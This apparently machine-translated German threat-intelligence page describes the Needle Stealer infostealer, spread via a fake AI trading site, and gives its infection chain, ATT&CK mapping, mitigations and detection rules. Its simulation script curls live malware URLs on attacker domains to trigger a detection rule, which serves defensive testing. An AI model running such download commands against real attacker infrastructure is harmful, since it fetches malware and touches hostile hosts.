Folgen 
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Eine betrügerische Website, die einen KI-gesteuerten Handelsassistenten bewirbt, wird verwendet, um den Needle Stealer Infostealer zu verbreiten. Die Infektionskette basiert auf DLL-Hijacking und Prozess-Hollowing, um die Malware in RegAsm.exeeinzuschleusen, damit sie sich in legitime Systemaktivitäten einfügt. Sobald aktiv, sammelt der Stealer Browserdaten, zielt auf Kryptowährungs-Walllet-Informationen und kann bösartige Browser-Erweiterungen einsetzen, um die Kompromittierung zu vertiefen. Die Kommunikation mit der vom Angreifer kontrollierten Infrastruktur erfolgt über mehrere HTTP-API-Endpunkte.
Untersuchung
Forscher haben den Infektionsfluss zu einem ZIP-Archiv zurückverfolgt, das von tradingclaw.proheruntergeladen wurde, das einen DLL-Loader namens iviewers.dllenthielt. Dieser Loader ließ eine zweite Stufe DLL fallen, die RegAsm.exe aushebelte und den Needle Stealer auf Basis von Golang startete. Weitere Analysen zeigten, dass der Stealer versteckte ZIP-Archive enthielt, die bösartige Browser-Erweiterungen zusammen mit einer Konfigurationsdatei enthielten, die seine Kommando-und-Kontroll-Server definierte.
Abmilderung
Benutzer sollten vermeiden, Software von nicht vertrauenswürdigen Webseiten herunterzuladen und immer die Signaturen der Herausgeber überprüfen, bevor sie eine Installation durchführen. Sicherheitsteams sollten regelmäßig installierte Browser-Erweiterungen prüfen und alle entfernen, die unautorisiert oder verdächtig erscheinen. Netzwerküberwachung sollte konfiguriert werden, um den Verkehr zu den bekannten bösartigen Domänen und IP-Adressen des Angriffs zu erkennen. Endpoint-Schutz-Tools sollten ebenfalls auf die Erkennung von DLL-Hijacking-Verhalten und Prozess-Hollowing-Techniken abgestimmt werden.
Reaktion
Verteidiger sollten die Endpunkt-Telemetrie auf Ausführungen von iviewers.dll und Anzeichen für Injektionen in RegAsm.exeüberprüfen. Die identifizierten Kommando-und-Kontroll-Domänen und IP-Adressen sollten auf Firewall- oder Proxy-Ebene blockiert werden. Sicherheitsteams sollten Dateien, die den gemeldeten Hashes oder Dateinamen entsprechen, isolieren, verdächtige Erweiterungen von %LOCALAPPDATA%PackagesExtensionsentfernen und die Anmeldedaten betroffener Konten zurücksetzen. Alle potenziell betroffenen Kryptowährungs-Wallets sollten ebenfalls auf unautorisierte Aktivitäten überprüft werden.
"graph TB %% Class definitions classDef action fill:#99ccff classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes step_a["<b>Aktion</b> – <b>T1659 Inhalt-Injektion</b><br/>Benutzer besucht bösartige TradingClaw-Website, um bösartige Inhalte zu erhalten.<br/><b>Beschreibung</b>: Gegner injizieren bösartige Inhalte in eine legitime Website, um Nutzlasten zu liefern."] class step_a action step_b["<b>Aktion</b> – <b>T1204.001 Bösartiger Link</b><br/>Benutzer klickt und lädt bösartiges ZIP-Archiv herunter.<br/><b>Beschreibung</b>: Benutzer wird dazu verleitet, auf einen bösartigen Link zu klicken, der zu Credential-Stealing oder einem anderen Payload-Download führt."] class step_b action step_c["<b>Aktion</b> – Mehrere Techniken<br/><b>Maskierung T1036.001</b>: iviewers.dll imitiert legitime Datei.<br/><b>Vertrauenssteuerungen T1553.002 untergraben</b>: Vertrauen durch Hijacking von DLLs umgehen.<br/><b>System-Binär-Proxyausführung T1218</b>: Verwendung eines Systembinares zur Ausführung.<br/><b>Trusted Developer Utilities Proxy Execution T1127</b>: Missbrauch vertrauenswürdiger Dienstprogramme.<br/><b>Reflektives Code-Loading T1620</b>: Laden von Code ohne Berührung der Festplatte.<br/><b>Beschreibung</b>: DLL-Hijacking über iviewers.dll zur Ausführung bösartiger Codes."] class step_c action step_d["<b>Prozesseinspritzung</b> – <b>T1055.012 Prozesseinsaliering</b><br/>Bösartiger Code wird in den RegAsm.exe-Prozess eingespritzt.<br/><b>Beschreibung</b>: Gegner erstellt einen leeren Prozess und fügt eine bösartige Nutzlast ein."] class step_d process step_e["<b>Malware</b> – Needle Stealer Kern<br/>Sammelt Opferdaten nach der Ausführung."] class step_e malware step_f["<b>Zugang zu Anmeldedaten</b> – <b>T1115 Zwischenablagen-Daten</b><br/>Sammelt Inhalte der Zwischenablage.<br/><b>Beschreibung</b>: Erfasst in die Zwischenablage kopierte Daten wie Passwörter."] class step_f action step_g["<b>Eingabeerfassung</b> – <b>T1056 Eingabeerfassung</b><br/>Erfasst getippte Formulareingaben.<br/><b>Beschreibung</b>: Zeichnet Tastenanschläge oder Formularfelder auf, um Anmeldedaten zu stehlen."] class step_g action step_h["<b>Zugang zu Anmeldedaten</b> – Mehrere Techniken<br/><b>Informationsentdeckung des Browsers T1217</b>: Ermittelt installierte Browser.<br/><b>Anmeldedaten aus Web-Browsern T1555.003</b>: Extrahiert gespeicherte Passwörter.<br/><b>Web-Sitzungs-Cookie T1550.004</b>: Liest Sitzungs-Cookies.<br/><b>Stehlen von Web-Sitzungs-Cookies T1539</b>: Exfiltriert Cookies.<br/><b>Web-Anmeldedaten fälschen T1606</b>: Erstellt gefälschte Anmeldedaten.<br/><b>Beschreibung</b>: Stiehlt Browserdaten, Anmeldedaten und Cookies."] class step_h action step_i["<b>Beharrlichkeit</b> – <b>T1176 Software-Erweiterungen</b><br/>Installiert bösartige Browser-Erweiterung.<br/><b>Beschreibung</b>: Erweiterung bleibt im Browser bestehen und kann den Datenverkehr verändern."] class step_i action step_j["<b>Aktion</b> – Erweiterung manipuliert den Datenverkehr<br/>Leitet Anfragen um, ersetzt Downloads, injiziert Skripte."] class step_j action step_k["<b>Kommando und Kontrolle</b> – Mehrere Techniken<br/><b>Datenverschlüsselung T1132.001</b>: Daten vor der Exfiltration verschlüsseln.<br/><b>Exfiltration über C2-Kanal T1041</b>: Daten durch C2 senden.<br/><b>Beschreibung</b>: Kommuniziert gestohlene Daten an einen entfernten Server."] class step_k action %% Connections step_a –>|führt zu| step_b step_b –>|führt zu| step_c step_c –>|führt zu| step_d step_d –>|führt zu| step_e step_e –>|sammelt| step_f step_e –>|sammelt| step_g step_e –>|sammelt| step_h step_e –>|installiert| step_i step_i –>|ermöglicht| step_j step_j –>|kommuniziert| step_k "
Angriffsfluss
Erkennungen
Möglicher DLL-Side-Loading-Versuch mit Oleview (via image_load)
Ansicht
Verdächtige Kommando-und-Kontrolle durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfragen (via dns)
Ansicht
IOCs (HashSha256) zur Erkennung: Bösartige Handels-Website bringt Malware, die Ihren Browser den Angreifern aushändigt
Ansicht
IOCs (SourceIP) zur Erkennung: Bösartige Handels-Website bringt Malware, die Ihren Browser den Angreifern aushändigt
Ansicht
IOCs (DestinationIP) zur Erkennung: Bösartige Handels-Website bringt Malware, die Ihren Browser den Angreifern aushändigt
Ansicht
Erkennung von bösartigen TradingClaw- und Umleitungsseiten [Webserver]
Ansicht
Simulationsausführung
Voraussetzung: Die Telemetrie- & Basislinien-Vorprüfung muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die dazu entworfen wurde, die Erkennungsregel auszulösen. Die Befehle und Narrative MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.
-
Angriffserzählung & Befehle:
Ein Gegner, der die Needle Stealer Malware erworben hat, hostet sie auf der bösartigen Domänetradingclaw.pro. Der Angreifer überredet ein Opfer dazu, einen bösartigen Link zu öffnen (z. B. über eine Phishing-E-Mail). Der Browser des Opfers stellt eine HTTP-GET-Anfrage anhttp://tradingclaw.pro/stealer.exe, die vom Proxy protokolliert wird. Da die URL den genauen String enthälttradingclaw.pro, bewertet sich die Bedingung der Sigma-Regel (url|contains) als wahr und erzeugt einen Alarm.Um dies in einer Testumgebung zu replizieren, geben wir direkt eine
curlAnfrage an die bösartige Domäne aus. Die Anfrage wird so gestaltet, dass sie wie typischer Nutzerverkehr aussieht (Standard User-Agent, keine speziellen Header), sodass nur die Domänenübereinstimmung den Alarm auslöst. -
Regressionstest-Skript:
#!/usr/bin/env bash # ------------------------------------------------------------ # Simulation bösartiger Zugriffe zur Auslösung der "Malicious TradingClaw" # Erkennungsregel. # ------------------------------------------------------------ set -euo pipefail # Definiere die bösartigen URLs (exakte Strings, die von der Regel verwendet werden) MALICIOUS_URLS=( "http://tradingclaw.pro/stealer.exe" "https://studypages.com/download/needle.exe" ) for url in "${MALICIOUS_URLS[@]}"; do echo "[*] Fordere ${url}" an # Verwende einen realistischen User-Agent, um einen Browser nachzuahmen curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, wie Gecko) Chrome/124.0 Safari/537.36" -s -o /dev/null "${url}" done echo "[+] Simulation abgeschlossen." -
Bereinigungskommandos:
# Durch die curl-Anfragen werden keine dauerhaften Artefakte erstellt. # DNS-Cache leeren, um versehentliche Wiederverwendung der Domäne bei späteren Tests zu vermeiden. if command -v ipconfig >/dev/null 2>&1; then ipconfig /flushdns elif command -v systemd-resolve >/dev/null 2>&1; then systemd-resolve --flush-caches fi echo "[+] Bereinigung abgeschlossen."
Ende des Berichts